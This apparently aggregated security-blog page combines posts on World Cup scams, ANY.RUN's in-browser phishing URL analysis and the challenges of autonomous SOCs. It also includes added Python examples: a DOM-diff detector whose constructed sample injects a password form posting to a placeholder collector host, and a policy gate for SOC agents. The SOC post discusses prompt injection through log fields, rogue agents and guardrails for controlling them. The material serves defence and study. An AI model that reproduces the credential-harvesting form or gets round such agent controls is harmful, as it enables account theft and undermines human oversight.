Fake websites mimicking popular sporting goods stores also offer to sell you shin guards, socks, jerseys, and any other gear. Of course, you’ll never see the merchandise, and you’ll lose both your money and your bank card details.


When they’ve absolutely no intention of delivering any products, they can easily offer massive discounts and free shipping

Deals that seem too good to be true are one of the biggest red flags. To make matters worse, with the help of AI, fake websites now look just as professional as the real ones, making them harder than ever to spot. That’s why we recommend installing our security suite before you start shopping online. It blocks phishing sites in real time and uses the Safe Money feature to keep your financial data secure.

Soccer by mail

Another attack strategy involves spam campaigns centered around the World Cup. In one email, our experts uncovered an ad for a soccer analytics and betting-tips service. It uses the classic high-pressure playbook: “ONLY 10 SPOTS AVAILABLE” — so hurry up before they run out! Naturally, access comes with a price tag: AU$200.

Spammers hurrying the victim to make a decision as quickly as possible


This scheme targets fans who are into sports betting, and paying for these types of services usually ends one of two ways for them: they either lose their money with zero guarantee of getting actual predictions, or get sucked into an even deeper, multi-step financial trap.

How to avoid falling for the scams

Across all these scenarios, the World Cup is just another convenient pretext for cybercriminals. Once the tournament wraps up, they’ll most certainly pivot back to their usual tricks — like fake job offers or Telegram phishing scams — until the next Olympics or soccer tournament rolls around and they switch right back to sport.

Our research consistently shows that online fraud has evolved into a massive illegal enterprise. You aren’t just up against lone scammers anymore; you’re dealing with large criminal networks. When it comes to defense, the best approach is a proactive one. By installing Kaspersky Premium, you can safeguard all your devices from malware, phishing, spam, and malicious or lookalike websites. Plus, the included Kaspersky Password Manager will generate unique complex passwords, securely store your sensitive data — like documents and bank cards — and stop you from auto-filling your credentials on fake sites.

  • Watch the games only on legitimate streaming platforms. Don’t trust fake reviews and never enter your bank card information on unverified sites. Keep an eye out not just for sketchy streaming websites, but also for fake IPTV apps. As we’ve covered in detail before, scammers frequently use these to infect your devices with Trojans.
  • Shop smart. The best way to avoid getting ripped off is to buy merchandise exclusively through official channels (where you won’t see suspiciously deep discounts), or simply buy your gear in person at official retail locations.
  • Don’t click suspicious links. If a deal that’s too good to be true lands in your inbox — whether it’s exclusive betting tips or anything else — just ignore it and hit delete.
  • Avoid logging in through Telegram bots. At the very least, this saves you from future headaches and annoying spam. At best, it keeps your account from being hijacked and your crypto from being stolen.
  • Switch to passkeys wherever possible. Unlike traditional passwords, which are easily stolen and can be typed into any fake login page, a passkey is cryptographically tied to a specific website and won’t work on a phishing page. Kaspersky Password Manager can easily store and sync your passkeys across all your devices.

What other ruses do scammers use to make a quick buck? Check out our other posts:

Kaspersky official blog – Read More

Protecting legacy OT systems against modern cyberthreats

Many manufacturing plants depend on OT systems that stay in service for many years. That long run can hide significant cybersecurity risks.

WeLiveSecurity – Read More

FishMonger’s arsenal upgraded: SprySOCKS for Windows

ESET researchers have discovered SprySOCKS for Windows, FishMonger’s backdoor weaponizing a kernel driver for advanced stealthiness.

WeLiveSecurity – Read More

The New Standard for URL Analysis: Closing Phishing Blind Spots with In-Browser Data Inspection 

Modern URL phishing relies on dynamic pages, credential harvesting flows, client-side scripts, and layered redirect chains. But most SOC workflows are still built around static analysis, making them blind to most of these tactics. 

ANY.RUN changes this forever with in-browser data inspection. 

The new technology takes URL analysis to the next level by bringing static and dynamic analysis into a single workflow. Now, every phishing URL’s behavior, such as script execution and redirects, is visible to the analyst in real time, leaving no blind spots for attackers to exploit.

Available to all ANY.RUN users, this new layer of URL phishing visibility provides a massive boost to triage and response speed for SOC and MSSP teams, enabling them to see and contain critical attacks before they become incidents.

Before vs. After: Fixing a Slow and Painful URL Triage Process

ANY.RUN delivers complete URL phishing context within seconds 

Right now, the typical URL analysis process for most SOC and MSSP teams looks like this: A suspicious URL comes in, and the analyst starts assembling context. They scan the URL to get basic info, sandbox it to see what it does, trace redirects, inspect traffic, and still have to piece everything together manually to make a decision. 

This turns every alert into a time-consuming task. Analysts spend extra time validating signals, escalate cases by default, and still risk closing malicious URLs without fully understanding their behavior.  

URL Analysis with ANY.RUN: Full Static & Dynamic URL Context within Seconds 

See all URL details, DOM changes, network requests, and IOCs in one place 

In-browser data inspection solves this friction by giving you the full static and dynamic URL context in just one click. The page executes in a real browser, and everything that matters (redirects, scripts, DOM changes, user-facing content) is captured and presented to you in a single view. No tab switching.

The result is an instant view of the attack in one place: how the user is redirected, what scripts drive the interaction, where data is collected, and how the phishing flow is constructed end-to-end.

The context that used to take up to an hour to collect is now delivered within seconds, complete with a verdict and ready for confident next-step decisions. 

Why Existing URL Investigation Approaches Fall Short 

Many security solutions still lack the dynamic browser-level visibility needed to clearly understand how a phishing attack unfolds in real time, resulting in critical gaps: 

  • Analysts may see a screenshot of the final page, but not the full path that led to it: redirects, scripts, iframe activity, and intermediate page states 
  • Limited visibility into the forms, content, and user-facing elements the victim actually saw and interacted with 
  • Missing context around DOM changes, injected content, and dynamically loaded elements during page execution 
  • Reliance on static page analysis instead of a dynamic, step-by-step view of real browser behavior 
  • Lack of automatically collected DOM history that allows analysts to inspect page changes across different execution stages 
  • No visibility into browser activity preceding WAF alerts or application logs 

Without browser-level inspection, critical evidence can remain hidden from investigators. As a result, analysts often need to combine multiple tools and data sources to fully understand a single URL. 

The Operational Impact of Visibility Gaps for Security Teams 

These visibility gaps create several operational challenges for SOC teams: 

  • Fragmented Workflow: Reconstructing webpage behavior across multiple tools and data sources slows investigations, increases manual effort, and delays response. 
  • Inefficient Resource Management: When analysts lack sufficient evidence to classify a URL confidently, potentially benign links are often escalated to senior team members, consuming valuable resources. 
  • Phishing Analysis Gap: Solutions focused on file or network activity may miss critical phishing context, leaving analysts without sufficient browser-level evidence. 

As phishing attacks continue to rise, security teams need faster and more reliable ways to investigate suspicious URLs. In-browser data inspection closes this visibility gap by introducing a new layer of webpage-level investigation evidence. 

Beyond URL Scanning: Full Browser Visibility for Phishing Investigations 

The functionality and impact delivered by ANY.RUN surpass what most solutions offer

As phishing and browser-based threats continue to grow in both volume and sophistication, it’s time for SOC and MSSP teams to upgrade their operations to match the reality of modern attacks. 

Available to all ANY.RUN users, in-browser data inspection introduces an investigation layer missing from many security operations today. Unlike workflows that force analysts to piece together evidence across multiple tools, ANY.RUN provides dynamic, in-depth browser visibility, making URL investigations faster, clearer, and more reliable. 

This new investigation layer enables SOC analysts to: 

  • Instantly validate, enrich, and prioritize phishing threats using evidence that often remains hidden in conventional URL analysis workflows 
  • Reduce uncertainty during investigations with direct visibility into what happens during execution 
  • Reveal the complete attack chain, including redirects, executed scripts, iframes, and dynamically loaded content 
  • Track browser and DOM changes across every stage of page execution 
  • Gather the evidence required for fast triage, escalation, and response from a single investigation workflow 
  • Access threat intelligence required for detection engineering, hunting, and campaign analysis 

All without leaving the sandboxing interface. 

Instead of relying solely on network logs or file traces, the new inspection method allows you to see all browser activity observed on the webpage, including forms, content, DOM changes, scripts, and redirects. This provides direct access to behavioral insights and evidence that often remain unavailable in URL analysis and sandboxing workflows. 

Unlike workflows that require analysts to manually reconstruct browser activity from multiple data sources, in-browser data inspection consolidates browser telemetry, page content, behavioral evidence, and threat intelligence into a single investigation experience. 

This allows teams to move from URL analysis to confident decisions faster, with less effort and greater visibility. The result is accelerated triage, more validated escalations, stronger detections, and more efficient security operations. 

Change the Way You Investigate Phishing with In-Browser Data Inspection 

In-browser data inspection changes how phishing investigations are performed. By delivering dynamic browser visibility within ANY.RUN’s Interactive Sandbox, it helps SOC and MSSP teams investigate threats faster, reduce uncertainty, and make more confident incident response decisions. 

Instead of piecing together screenshots, redirects, page content, browser artifacts, and external intelligence from multiple tools, analysts receive a complete browser-level investigation within a single workflow. 

To start your investigation, simply open the Browser Data tab to access a complete, dynamic view of the web page execution. It’s available within every URL analysis in ANY.RUN’s Interactive Sandbox.

View analysis 

Phishing analysis inside ANY.RUN’s Interactive Sandbox. Browser Data tab  

Understand the Attack Flow 

The Browser Data tab within ANY.RUN’s Interactive Sandbox provides the entire web page execution tree, from the initial URL to the final page view, featuring all redirects and activated iframes. Color highlights and tags point to the pages responsible for triggering detections.

Investigation outcome: Accelerate triage and escalation decisions by gaining an immediate overview of the dynamic attack flow and identifying the most relevant stages for further analysis. 

HTTP Requests tab within Browser Data section. ANY.RUN’s Interactive Sandbox 

Detailed HTTP Requests data provides complete visibility into redirects, requests, and responses generated during page execution.  

Investigation outcome: Improve threat validation and detection engineering by reconstructing redirect chains and collecting evidence for IDS detections and network-based hunting rules. 

Analyze Browser-Level Behavior 

URL Details displays related context and screenshots. ANY.RUN’s Interactive Sandbox 

Explore browser-level telemetry, including triggered signatures, domain, URL, and IP statistics, as well as rendered screenshots of the analyzed page. 

To see which code fragments were added to the DOM after the page loaded, go to the HTML DOM Changes tab for deobfuscation. It will reveal what static analysis misses: 

View analysis 

The green lines show the new code that was added to the DOM after the page loaded. ANY.RUN’s Interactive Sandbox

In-browser data inspection captures the fully rendered and interactive state of the page, allowing the analyst to see the actual behavior, including hidden forms, redirects, and user interaction logic that were impossible to understand statically. 

Investigation outcome: Strengthen threat hunting and detection engineering by identifying phishing elements, reconstructing the loading process, and extracting behavioral artifacts. 
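To make the static-versus-rendered gap concrete, here is an added example (not ANY.RUN's code) that diffs a page's raw source against its post-load DOM, the way a DOM-history view highlights added lines, and then parses only the additions for artifacts a static scan never sees. Both HTML snapshots are constructed inline; the domains in them are placeholders.

```python
"""Diff a page's static source against its post-load DOM to surface 'ghost' code.

Added example: STATIC_SOURCE stands in for the raw HTTP response body, RENDERED_DOM
for the DOM a real browser captured after scripts ran. Both are constructed samples.
"""
import difflib
from html.parser import HTMLParser

# Constructed sample: what a plain fetch of the URL returns. No form, no credential
# fields; a scanner that only reads this sees a harmless loading page.
STATIC_SOURCE = """<html><head><title>Document shared with you</title></head>
<body>
<div id="app">Loading secure document...</div>
<script src="/assets/loader.js"></script>
</body></html>"""

# Constructed sample: the same page after loader.js executed in the browser.
RENDERED_DOM = """<html><head><title>Document shared with you</title></head>
<body>
<div id="app">Loading secure document...</div>
<script src="/assets/loader.js"></script>
<form id="login" method="post" action="https://collector.example.invalid/post">
<input type="email" name="login">
<input type="password" name="passwd">
<input type="submit" value="Sign in">
</form>
<iframe src="https://decoy.example.invalid/doc.pdf" style="display:none"></iframe>
</body></html>"""


def added_lines(static_html: str, rendered_html: str) -> list[str]:
    """Lines present in the rendered DOM but absent from the static source:
    the 'green lines' of a DOM-history view."""
    diff = difflib.unified_diff(
        static_html.splitlines(), rendered_html.splitlines(), lineterm="", n=0
    )
    return [ln[1:] for ln in diff if ln.startswith("+") and not ln.startswith("+++")]


class _InjectedContent(HTMLParser):
    """Collect forms (with their action and input types) and hidden iframes."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: list[dict] = []
        self.hidden_iframes: list[str] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append(a.get("type", "text"))
        elif tag == "iframe":
            style = (a.get("style") or "").replace(" ", "")
            if "display:none" in style:
                self.hidden_iframes.append(a.get("src", ""))


def injected_phishing_artifacts(static_html: str, rendered_html: str) -> list[str]:
    """Parse only the post-load additions and describe what a static scan misses."""
    parser = _InjectedContent()
    parser.feed("\n".join(added_lines(static_html, rendered_html)))
    findings = []
    for form in parser.forms:
        if "password" in form["inputs"]:
            findings.append(
                f"credential form injected after load, posting to {form['action']}"
            )
    for src in parser.hidden_iframes:
        findings.append(f"hidden iframe injected after load: {src}")
    return findings


if __name__ == "__main__":
    for line in added_lines(STATIC_SOURCE, RENDERED_DOM):
        print("+", line)
    for finding in injected_phishing_artifacts(STATIC_SOURCE, RENDERED_DOM):
        print("!", finding)
```

On a page with no post-load changes the functions return empty lists, so the same check also confirms when the static view was complete.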

Expand the Investigation Beyond the Initial Sample 

Track all related indicators in a dedicated tab. ANY.RUN’s Interactive Sandbox 

Collected Indicators include URLs, domains, IP addresses, and hashes of web content associated with the analyzed page. 

Investigation outcome: Expand investigations beyond a single sample by developing pivoting hypotheses and uncovering attacker-controlled infrastructure. 

Content extracted from web page snapshots can also be used to create custom hunting and detection rules backed by ANY.RUN Threat Intelligence. 

YARA rule built based on Browser Data. ANY.RUN’s TI Lookup & YARA Search 

In this example, a YARA rule created from a single phishing page identified 145 related samples within Threat Intelligence Lookup & YARA Search.

YARA rule browsing results. ANY.RUN’s TI Lookup & YARA Search 

Investigation outcomes: 

  • Expand visibility beyond a single URL or alert 
  • Validate threat hunting hypotheses with browser-level evidence 
  • Assess the scale of an attack campaign 
  • Develop resilient detections based on attacker tooling and page artifacts 

Turning Powerful Visibility into Stronger Security Outcomes 

By combining interactive sandboxing, full browser-level visibility, and threat intelligence sourced from over 15,000 security teams, ANY.RUN transforms URL investigations from fragmented, manual analysis into fast, evidence-based decision-making. 

Through eliminating visibility gaps and reducing the need for disconnected tools, security teams can improve outcomes across the entire investigation workflow: 

  • Faster triage and fewer unnecessary escalations: With immediate access to browser-level evidence, Tier 1 analysts can validate suspicious URLs faster and escalate fewer benign cases, improving productivity and reducing pressure on senior teams. 
  • Smoother handoff and incident response: When escalation is required, Tier 2 analysts receive a complete evidence package rather than disconnected indicators, accelerating validation and reducing MTTR. 
  • Stronger detection engineering: Browser telemetry provides a new source of intelligence for building custom detections, hunting hypotheses, and phishing signatures based on real-world attack behavior. 
  • Structured reporting: Built-in SOC-ready reports transform complex investigations into decision-ready intelligence, simplifying triage, escalation, response, and stakeholder communication. 

For enterprises and MSSPs, these operational improvements translate into faster investigations, more efficient use of analyst resources, stronger phishing defenses, and the ability to scale security operations without proportionally increasing workload. 

Conclusion 

In-browser data inspection closes a critical visibility gap in modern phishing investigations. With it, SOC analysts and threat hunters can investigate phishing attacks directly inside ANY.RUN without manually extracting web content from traffic captures, reconstructing redirect chains, or comparing raw page source against the content rendered in the browser. 

Instead, all browser-level evidence is collected, correlated, and presented within a single investigation environment, helping enterprise security teams investigate threats faster and respond with greater confidence. 

About ANY.RUN 

ANY.RUN helps SOC teams, MSSPs, and enterprises investigate cyber threats faster through interactive malware analysis and threat intelligence. 

Its cloud-based Interactive Sandbox enables security teams to safely analyze suspicious files, URLs, and emails in real time, observe attack behavior as it unfolds, and collect actionable evidence for rapid response. 

ANY.RUN’s Threat Intelligence solutions provide additional context around threats, infrastructure, and attacker activity, helping organizations enrich investigations, streamline security workflows, and improve threat detection. Together, these capabilities enable faster triage, more informed decision-making, and more efficient security operations at scale. 

FAQ 

What is in-browser data inspection? 

In-browser data inspection is a new ANY.RUN capability that collects and displays browser-level activity during URL analysis, including page content, forms, scripts, redirects, screenshots, and DOM modifications. 

How does in-browser data inspection improve phishing analysis? 

It provides visibility into what actually happens inside the browser, helping analysts identify phishing forms, deceptive content, redirect chains, and other browser-based attack techniques that may not be visible through network or file analysis alone. 

What browser data can analysts investigate in ANY.RUN? 

Analysts can examine page content, rendered screenshots, forms, scripts, DOM changes, redirects, URLs, domains, IP addresses, and other browser-level artifacts collected during URL execution. 

How does in-browser data inspection help SOC teams? 

By providing immediate access to browser-level evidence, it reduces manual investigation effort, improves triage accuracy, minimizes unnecessary escalations, and accelerates incident response. 

Can in-browser data inspection be used for threat hunting? 

Yes. Analysts can use collected indicators, page artifacts, and browser telemetry to pivot across related infrastructure, investigate phishing campaigns, and develop threat hunting hypotheses. 

How can browser inspection data improve threat detection? 

Security teams can use content extracted from analyzed web pages to create custom detection rules and hunting signatures, including YARA rules, to identify related threats and phishing campaigns. 

Is in-browser data inspection available in ANY.RUN Interactive Sandbox? 

Yes. In-browser data inspection is available within URL analyses in ANY.RUN’s Interactive Sandbox through the Browser Data tab. 

The post The New Standard for URL Analysis: Closing Phishing Blind Spots with In-Browser Data Inspection appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

EvilTokens: A phishing attack that doesn’t steal your password

A phishing kit subverting Microsoft’s legitimate authentication flow lets attackers break into accounts without stealing passwords or creating fake login pages.

WeLiveSecurity – Read More

Building an autonomous SOC: core challenges and solutions

The concept of a completely autonomous security operations center (SOC) — where data collection, analysis of suspicious events, investigations, and incident response happen without human intervention — is extremely compelling. This is especially true for organizations grappling with a chronic shortage of cybersecurity talent and a threat landscape that’s growing faster and more sophisticated by the day. Organizations everywhere would welcome an approach where automation helps relieve analyst workloads, shortens alert triage times, and finally eliminates the backlog of unaddressed alerts — which, by some estimates, accounts for 67% of all security events in the average corporate SOC.

While many vendors are already pitching solutions in this space, real-world implementation remains highly problematic. Practitioners report tangible success when using these tools for alert enrichment and filtering out low-priority noise or false positives. However, when it comes to autonomous decision-making and response, very few organizations have managed to achieve a meaningful return on investment.

Foundational roadblocks of an autonomous SOC: looking beyond AI

While leveraging AI for data analysis and decision-making sounds like a logical and relatively easy-to-implement idea, actually putting it into practice exposes and amplifies the exact same challenges organizations faced with SIEM, XDR, and SOAR platforms:

Source data quality. Issues with coverage, enrichment quality, tagging and normalization, which detection engineering teams in every SOC battle daily, become even more acute when AI is introduced. AI agents are more sensitive to data gaps than human analysts, so incomplete data can magnify the resulting errors.

Data consolidation and tool integration. The very problem SIEM was once invented to solve remains a headache for most organizations today. Interestingly, marketing for AI-driven SOCs often claims that “the SIEM is dead” because “agents can just query the EDR directly for telemetry”. In reality, however, even in a best-case scenario, this just means the SIEM disappears as a user interface while its core functions remain embedded within the data fabric of the agentic SOC.

Analysts’ trust. Even when AI is restricted to preliminary data gathering and recommendations, human analysts frequently don’t trust the output, leading them to waste time re-collecting and re-analyzing the same data. Practitioners frequently point to several flaws in current AI SOC implementations: poor handling of gray-area verdicts (when an alert is suspicious but not definitively malicious), lack of safe escalation workflows, and systems that fail to learn when a human analyst corrects their mistakes.

Context deficit. SOCs and security teams in general naturally rely on scantily documented information, such as business context and tribal knowledge, to accurately assess alerts and incidents. It’s very difficult to populate an AI system with that knowledge in a systematic way.

AI-specific issues critical for a SOC

Beyond traditional operational hurdles, fully autonomous SOCs face inherent flaws deeply rooted in the fundamental architecture of language models and AI agents.

Hallucinations and prompt injections. In a SOC environment, a single manipulated log field can easily become a viable exploit vector aimed directly at the agent. In a semi-autonomous setup, an AI hallucination is just a frustrating distraction that erodes analyst trust. In a fully autonomous SOC, however, a hallucination can trigger instantaneous, harmful actions across hundreds or thousands of endpoints simultaneously. A prime example of this risk is the widely cited incident at a Fortune 50 company, where an AI agent went rogue and rewrote access policies on its own.

Need for control. To combat hallucinations and over-automation, organizations typically rely on a human-in-the-loop (HITL) model to approve an agent’s actions. While this improves safety, it completely defeats the primary selling point of agentic AI: response times.

Compliance, audits, and accountability. The inherently stochastic nature of LLM outputs makes logging problematic. They often lack reproducibility and explanations. Consequently, an autonomous SOC will likely struggle to pass regulatory compliance audits. Simply put, current compliance frameworks were never designed to handle the unpredictable behavior of multiple interacting AI agents.

Strategies to overcome the challenges of an autonomous SOC

Specialized frameworks are emerging to address these built-in flaws of AI agents and language models. For the most part, these solutions focus on enforcing formal boundaries around AI privileges, and validating its actions.

Rigorous context engineering. Assuming source data is correct and properly enriched, the number of hallucinations can be minimized, and agent decision quality significantly improved by feeding the language model structured layers of context — such as alerts, user accounts, asset data, and enrichment data.

Narrowing the scope of work. AI agents are less likely to go off the rails when confined to highly repetitive, narrow tasks. For example, an “agent for collecting additional host data” is going to be more effective than an “autonomous threat hunter”.

Neurosymbolic validations and guardrails for agent actions. An Agent-Lock pipeline cleans untrusted log fields and verifies proposed actions against existing CMDB/IAM policies. This approach enforces key rules, such as making it impossible for the AI to disable telemetry, while managing “autonomy budgets”.

Tiered autonomy over all-or-nothing automation. The Trusted Autonomy framework maps out progressive levels of AI independence based on human-in-the-loop roles and trust thresholds across monitoring, detection, and response. Low-risk operations like data enrichment and alert deduplication run fully automated, while high-blast-radius actions require mandatory human approval.

Governance-first architecture. The LanG platform, which utilizes a hierarchical approach: Governance → MCP → Agentic AI → Security, is one example. It enforces two mandatory human analyst check-ins, fully aligning the workflow with NIST SP 800-61 guidelines. The trade-off, however, is that this framework significantly scales back the solution’s autonomy.

Deterministic execution for high-risk actions. Triage and investigation are handled by a probabilistic AI model, but high-impact actions — like deciding to isolate a host or terminate a session — are based on deterministic code. This approach allows the system to satisfy the strict requirements of SOC 2 and other major regulatory frameworks.

Stateful admission control. For example, the recently proposed ACP protocol monitors behavioral patterns across agent execution logs. This makes it possible to catch rogue agents that are executing a series of individually harmless requests that add up to a coordinated attack.
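The strategies above share one shape: a deterministic gate sits between the agent's proposal and its execution. The following added example (not the Agent-Lock, Trusted Autonomy, LanG or ACP implementations the post mentions) folds their described ideas into one small gate: a hard deny rule for disabling telemetry, tiered autonomy with human approval for high-blast-radius actions, an autonomy budget, and stateful admission control over the agent's recent action history. All action names, tiers and thresholds are assumptions chosen for illustration.

```python
"""Deterministic policy gate for actions proposed by a SOC agent (added example).

Tier 0 runs unattended, tier 1 runs unattended within an autonomy budget, tier 2
always waits for a human, and None is never permitted. The agent's free-text
justification is carried along but never parsed, so a manipulated log field or
prompt injection cannot argue its way past the policy.
"""
from collections import deque
from dataclasses import dataclass, field

# Assumed action catalogue and tiers; a real deployment derives these from CMDB/IAM policy.
ACTION_TIERS = {
    "enrich_alert": 0,
    "dedupe_alerts": 0,
    "collect_host_data": 1,
    "block_ip": 1,
    "isolate_host": 2,
    "terminate_session": 2,
    "disable_telemetry": None,  # hard rule: the agent must never blind the SOC
}


@dataclass
class ProposedAction:
    kind: str
    target: str
    justification: str  # untrusted text from the agent, logged but not interpreted


@dataclass
class Decision:
    outcome: str  # "allow", "hold_for_human" or "deny"
    reason: str


@dataclass
class ActionGate:
    budget_per_window: int = 5   # unattended tier-1 actions allowed per window
    window: int = 20             # sliding window length, in event ticks
    fanout_limit: int = 3        # distinct targets one action kind may touch before a hold
    history: deque = field(default_factory=deque)  # (tick, kind, target) of executed actions

    def _recent(self, now: int) -> list[tuple]:
        return [h for h in self.history if now - h[0] < self.window]

    def decide(self, action: ProposedAction, now: int) -> Decision:
        tier = ACTION_TIERS.get(action.kind, 2)  # unknown actions default to human review
        if tier is None:
            return Decision("deny", f"{action.kind} is prohibited by policy")
        recent = self._recent(now)
        # Stateful admission control: individually harmless actions of one kind fanning
        # out across many targets within the window look like a coordinated sweep.
        targets = {t for _, k, t in recent if k == action.kind}
        targets.add(action.target)
        if tier >= 1 and len(targets) > self.fanout_limit:
            return Decision(
                "hold_for_human", f"{action.kind} would touch {len(targets)} targets in window"
            )
        # Tiered autonomy: high-blast-radius actions always get a human check-in.
        if tier == 2:
            return Decision("hold_for_human", f"{action.kind} exceeds autonomous blast radius")
        # Autonomy budget: cap unattended tier-1 actions per window.
        if tier == 1:
            spent = sum(1 for _, k, _ in recent if ACTION_TIERS.get(k) == 1)
            if spent >= self.budget_per_window:
                return Decision("hold_for_human", "autonomy budget exhausted for this window")
        self.history.append((now, action.kind, action.target))  # only executed actions count
        return Decision("allow", f"tier {tier} action within policy")


if __name__ == "__main__":
    gate = ActionGate()
    proposals = [
        ProposedAction("disable_telemetry", "edr-sensor-01", "reduce alert noise"),
        ProposedAction("enrich_alert", "alert-4711", "add asset owner"),
        ProposedAction("isolate_host", "ws-finance-07", "confirmed C2 beacon"),
    ] + [ProposedAction("block_ip", f"10.0.0.{i}", "beacon destination") for i in range(4)]
    for tick, p in enumerate(proposals):
        d = gate.decide(p, tick)
        print(f"{p.kind:<18} {p.target:<16} -> {d.outcome:<15} {d.reason}")
```

Held actions are not written to the history, so a human who approves one would record it separately; the gate only tracks what actually executed unattended.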

Key takeaways and pitfalls

We can already confidently state that an autonomous SOC is highly unlikely to bring any improvements for organizations burdened by significant technical and operational debt in areas like data collection and enrichment or standardized incident response workflows. No layer of AI infrastructure will function without that baseline foundation firmly in place.

It’s also clear that, while AI streamlines analyst workflows, it doesn’t completely replace them. This is why Gartner’s prediction that there will never be an autonomous SOC still rings true in 2026. Deploying autonomous agents into the SOC shifts the center of gravity to complex investigations, but most importantly, to complex engineering. Teams will simply trade fine-tuning detection rules for managing AI agent playbooks, data pipelines, and decision-handling workflows.

For mature SOCs, the core hypothesis for the next one to two years is this: an autonomous SOC should be viewed as a direction rather than a destination. AI is already delivering tangible value today — specifically in correlation, enrichment, draft detection rules, and attack reconstruction — provided that each capability has proper security guardrails. These include a well-balanced human-in-the-loop review process for any action that impacts production environments. Security teams investing now in a structured, verifiable approach — one that actively anticipates emerging regulations — will be able to gradually integrate new agentic features into their SOC pipelines. Conversely, organizations that skip this layer will almost certainly run into roadblocks, likely forcing them to rebuild their systems and processes from the ground up.

Kaspersky official blog – Read More